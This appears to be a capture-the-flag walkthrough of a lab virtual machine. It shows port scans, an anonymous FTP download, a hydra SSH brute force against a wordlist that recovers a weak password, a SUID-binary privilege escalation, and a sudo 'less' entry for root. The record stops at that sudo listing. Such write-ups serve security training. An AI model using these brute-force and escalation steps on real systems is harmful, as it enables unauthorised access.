[~] The config file is expected to be at "/root/.rustscan.toml" [~] File limit higher than batch size. Can increase speed by increasing batch size '-b 10140'. Open 192.168.100.46:22 Open 192.168.100.46:21 Open 192.168.100.46:80 [~] Starting Script(s) [>] Running script "nmap -vvv -p {{port}} -{{ipversion}} {{ip}} -A" on ip 192.168.100.46 Depending on the complexity of the script, results may take some time to appear. [~] Starting Nmap 7.99 ( https://nmap.org ) at 2026-06-01 17:12 +0800 NSE: Loaded 158 scripts for scanning. NSE: Script Pre-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed Initiating ARP Ping Scan at 17:12 Scanning 192.168.100.46 [1 port] Completed ARP Ping Scan at 17:12, 0.05s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 17:12 Completed Parallel DNS resolution of 1 host. at 17:12, 1.50s elapsed DNS resolution of 1 IPs took 1.50s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 2, CN: 0] Initiating SYN Stealth Scan at 17:12 Scanning 192.168.100.46 [3 ports] Discovered open port 21/tcp on 192.168.100.46 Discovered open port 22/tcp on 192.168.100.46 Discovered open port 80/tcp on 192.168.100.46 Completed SYN Stealth Scan at 17:12, 0.02s elapsed (3 total ports) Initiating Service scan at 17:12 Scanning 3 services on 192.168.100.46 Completed Service scan at 17:12, 6.02s elapsed (3 services on 1 host) Initiating OS detection (try #1) against 192.168.100.46 NSE: Script scanning 192.168.100.46. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:12 NSE: [ftp-bounce 192.168.100.46:21] PORT response: 500 Illegal PORT command. Completed NSE at 17:12, 5.52s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.04s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed Nmap scan report for 192.168.100.46 Host is up, received arp-response (0.00060s latency). Scanned at 2026-06-01 17:12:21 CST for 13s
PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack ttl 64 vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff:192.168.100.36 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 1 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_drwxr-xr-x 2 65534 65534 4096 Dec 09 02:32 archivos_publicos 22/tcp open ssh syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u7 (protocol 2.0) | ssh-hostkey: | 256 af:79:a1:39:80:45:fb:b7:cb:86:fd:8b:62:69:4a:64 (ECDSA) | ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBA9i7hiBgZdbqok5ESuJPFfkPuRpcCT6UEeh71LyPq3i2pfdC6S1w4UYO17jknxy06B1COEcaGELE4n2KCor3M4= | 256 6d:d4:9d:ac:0b:f0:a1:88:66:b4:ff:f6:42:bb:f2:e5 (ED25519) |_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOaMroBaMRuicicDHyP1mRMULBpy4OqNENpp/l/O/cIq 80/tcp open http syn-ack ttl 64 Apache httpd 2.4.65 ((Debian)) | http-methods: |_ Supported Methods: GET POST OPTIONS HEAD |_http-server-header: Apache/2.4.65 (Debian) |_http-title: Apache2 Debian Default Page: It works MAC Address: 08:00:27:4D:B7:9F (Oracle VirtualBox virtual NIC) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running: Linux 4.X|5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 4.15 - 5.19, OpenWrt 21.02 (Linux 5.4), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) TCP/IP fingerprint: OS:SCAN(V=7.99%E=4%D=6/1%OT=21%CT=%CU=35492%PV=Y%DS=1%DC=D%G=N%M=080027%TM= OS:6A1D4D02%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=107%TI=Z%CI=Z%II=I%T OS:S=A)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5= OS:M5B4ST11NW7%O6=M5B4ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=F OS:E88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0% OS:Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S= OS:A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R= OS:Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N% OS:T=40%CD=S)
Uptime guess: 15.120 days (since Sun May 17 14:20:19 2026) Network Distance: 1 hop TCP Sequence Prediction: Difficulty=258 (Good luck!) IP ID Sequence Generation: All zeros Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE HOP RTT ADDRESS 1 0.60 ms 192.168.100.46
NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 17:12 Completed NSE at 17:12, 0.00s elapsed Read data files from: /usr/share/nmap OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 14.67 seconds Raw packets sent: 26 (1.938KB) | Rcvd: 18 (1.410KB)
┌──(root㉿Eecho)-[~] └─# ftp anonymous@192.168.100.46 Connected to 192.168.100.46. 220 (vsFTPd 3.0.3) 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp> ls 229 Entering Extended Passive Mode (|||33700|) 150 Here comes the directory listing. drwxr-xr-x 2 65534 65534 4096 Dec 09 02:32 archivos_publicos 226 Directory send OK. ftp> cd archivos_publicos 250 Directory successfully changed. ftp> ls 229 Entering Extended Passive Mode (|||24695|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 622 Dec 09 02:32 manifiesto_clase_alpha.txt 226 Directory send OK. ftp> get manifiesto_clase_alpha.txt local: manifiesto_clase_alpha.txt remote: manifiesto_clase_alpha.txt 229 Entering Extended Passive Mode (|||44957|) 150 Opening BINARY mode data connection for manifiesto_clase_alpha.txt (622 bytes). 100% |*******************************************************************************************************************************************| 622 239.42 KiB/s 00:00 ETA 226 Transfer complete. 622 bytes received in 00:00 (195.87 KiB/s) ftp> ^D 221 Goodbye. ┌──(root㉿Eecho)-[~] └─# cat manifiesto_clase_alpha.txt [NAVE NODRIZA - BITÁCORA DE COMUNICACIÓN]
Mensaje para el Capitán Jano:
"Capitán, confirmo el descenso de emergencia en Titán. La tripulación fue reubicada en grupos de trabajo basados en su rango. Lamentablemente, el protocolo de seguridad falló en las bajas jerarquías. La contraseña de mi terminal de acceso (SSH) fue comprometida; es un término de uso muy común aquí, lo encontré en un listado de seguridad de la vieja Tierra. Debe ser reemplazada inmediatamente. Necesito que el equipo de Analistas me abra un canal de escalada urgente para recuperar el control de mi sesión."
┌──(root㉿Eecho)-[~] └─# hydra -l excluido -P /usr/share/wordlists/rockyou.txt ssh://192.168.100.46 -t 4 -Vv Hydra v9.6 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-06-09 23:00:18 [WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore [DATA] max 4 tasks per 1 server, overall 4 tasks, 14344399 login tries (l:1/p:14344399), ~3586100 tries per task [DATA] attacking ssh://192.168.100.46:22/ [VERBOSE] Resolving addresses ... [VERBOSE] resolving done [INFO] Testing if password authentication is supported by ssh://excluido@192.168.100.46:22 [INFO] Successful, password authentication is supported by ssh://192.168.100.46:22 [ATTEMPT] target 192.168.100.46 - login "excluido" - pass "123456" - 1 of 14344399 [child 0] (0/0) [ATTEMPT] target 192.168.100.46 - login "excluido" - pass "12345" - 2 of 14344399 [child 1] (0/0) [ATTEMPT] target 192.168.100.46 - login "excluido" - pass "123456789" - 3 of 14344399 [child 2] (0/0) [ATTEMPT] target 192.168.100.46 - login "excluido" - pass "password" - 4 of 14344399 [child 3] (0/0) [22][ssh] host: 192.168.100.46 login: excluido password: password
The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Tue Jun 9 16:58:18 2026 from 192.168.100.19 excluido@TheHackersLabs-NaveNodriza:~$ id uid=1001(excluido) gid=1001(excluido) grupos=1001(excluido) excluido@TheHackersLabs-NaveNodriza:~$
提权
excluido -> analista
查找suid文件
1
find / -perm -4000 2>/dev/null
使用strings可以发现执行了/bin/bash且有s位
拥有者是analista,所以可以利用ejecutor_shell提权到analista用户
analista -> investigador
1 2 3 4
excluido@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$ /opt/nave_nodriza_herramientas/ejecutor_shell analista@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$ id uid=1002(analista) gid=1001(excluido) grupos=1001(excluido) analista@TheHackersLabs-NaveNodriza:/opt/nave_nodriza_herramientas$
investigador@TheHackersLabs-NaveNodriza:~/.ssh$ sudo -l sudo: unable to resolve host TheHackersLabs-NaveNodriza: Nombre o servicio desconocido Matching Defaults entries for investigador on TheHackersLabs-NaveNodriza: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty
User investigador may run the following commands on TheHackersLabs-NaveNodriza: (root) NOPASSWD: /usr/bin/less